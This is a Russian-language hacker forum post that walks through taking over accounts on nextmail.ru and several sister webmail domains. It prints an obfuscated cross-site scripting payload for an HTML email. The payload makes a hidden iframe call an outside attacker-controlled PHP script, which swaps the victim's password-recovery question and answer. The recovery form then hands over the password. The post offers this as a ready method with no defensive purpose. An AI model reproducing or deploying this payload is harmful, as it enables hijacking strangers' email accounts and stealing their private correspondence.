Да.. снова о взломе почты. Старым добрым проверенным способом. Кому-то может быть и надоело, но слишком часто встречаюца мне в последнее время такие "чудесные" творения веб-мастеров, и кому-то может будет даже интересно. Короче <span style='color:green'>http://nextmail.ru(xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru)</span>, об этой почте и пойдет речь. Заводим ящик на рамблер.ру, пишем письмо на адрес [email protected], в тело письма копируем: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58document.getElementById('xxx').innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <span id=xxx></span>[/QUOTE]<span id='postcolor'> Перед отправкой ставим флажок "в виде хтмл"(чем мне и нравицца собственно рамблер). Злодей читает письмо, срабатывает наш скрипт(удивительно, но JS проходит почти любым способом, при том при всем, что в настройках ящика по умолчнию стоит повышенная безопасность, типа от всяких вредоносных скриптов)) скриптзначит срабатывает, прописывается <iframe>, вызывается пхп http://znakomstva.flip.ru/pochta.php?quest=X&answ=Y , меняются: вопрос на X, ответ на Y. Ну а дальше все понтно. Кстати оченб приятный интерфейс напоминания пароля)) Вводишь мыло, задается вопрос, вводишь ответ - и парольчик прямо тут и выдается) быстро и качественно, как говориться гыгы Скрипт pochta.php не привожу, подобный уже был описан во взломе форум.хакер.ру
